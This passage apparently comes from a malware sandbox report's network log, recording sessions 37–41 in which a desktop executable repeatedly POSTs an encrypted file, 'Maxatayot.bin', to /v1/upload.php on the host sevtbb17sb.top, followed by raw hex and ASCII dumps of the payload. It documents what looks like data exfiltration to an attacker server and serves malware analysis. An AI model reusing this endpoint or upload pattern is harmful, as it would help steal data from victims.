Oct 20, 2024 22:48:07.981893063 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:07.981925964 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:07.981960058 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:07.981987000 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:07.982045889 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:07.982080936 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49815	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:09.430140972 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:09.430200100 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:09.435049057 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:09.435172081 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:09.435203075 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:09.435246944 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:09.435275078 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:09.435328007 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:09.435357094 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:09.435401917 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49822	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:10.837290049 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:10.837343931 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:10.842210054 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:10.842353106 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:10.842386961 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:10.842449903 CEST	4944	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:10.842540979 CEST	4944	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:10.842605114 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49833	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:12.399019003 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:12.399075985 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:12.404364109 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:12.404400110 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:12.404416084 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:12.404649973 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:12.405194044 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:12.405213118 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:12.405318975 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:12.405333042 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49840	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:13.915754080 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:13.915841103 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:13.920902014 CEST	3708	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:13.920944929 CEST	4944	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:13.920998096 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:13.921082973 CEST	4944	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:13.921118975 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49847	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:15.336762905 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:15.336852074 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:15.342036963 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
